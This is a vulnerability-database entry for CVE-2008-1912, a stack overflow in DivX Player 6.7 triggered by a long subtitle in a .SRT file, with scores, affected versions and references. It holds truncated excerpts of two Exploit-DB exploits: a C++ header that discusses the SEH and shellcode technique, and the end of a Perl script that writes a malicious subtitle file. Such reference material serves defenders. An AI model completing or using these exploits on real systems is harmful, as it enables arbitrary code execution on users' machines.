CVE-2008-1912
Published 2008-04-22
Priority: P344 | Severity: critical | CVSS 2.0 score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 11.73% (95.5th percentile)
Stack-based buffer overflow in DivX Player 6.7 build 6.7.0.22 and earlier allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long subtitle in a .SRT file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| divx | divx_player | <= 6.7 | — |
No detection rules found.
Exploit-DB
DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
exploitdb·2008-04-24
---
// Exploit.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
/***********************************************************************
DivX Player <=6.7 srt subtitle parsing exploit
Coded by [email protected]
Tested on Windows XP SP2 + DivX Player 6.7.0
Credit to securfrog for his PoC
Actually this exploit is not relevant to DivX 6.6.0 exploit already posted in milw0rm,since the
technique is quite different and that exploit is no use for DivX 6.7
One of the biggest problem is shellcode being converted to unicode (so it has unwanted null byte )
also the return address,or seh handler has the null byte too
Another quite touch problem is address of SEH structure(at FS:[0]) is rewritten at
Exploit-DB
DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)
exploitdb·2008-04-15
---
# DIVX Player >$file") or die "Cannot open $file: $!";
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;
close($file);
print "$file has been created \n";
# milw0rm.com [2008-04-15]
No writeups or analysis indexed.
References
http://secunia.com/advisories/29780
http://www.securityfocus.com/archive/1/490898/100/0/threaded
http://www.securityfocus.com/bid/28799
http://www.securitytracker.com/id?1019921
http://www.vupen.com/english/advisories/2008/1235/references
https://www.exploit-db.com/exploits/5453
https://www.exploit-db.com/exploits/5492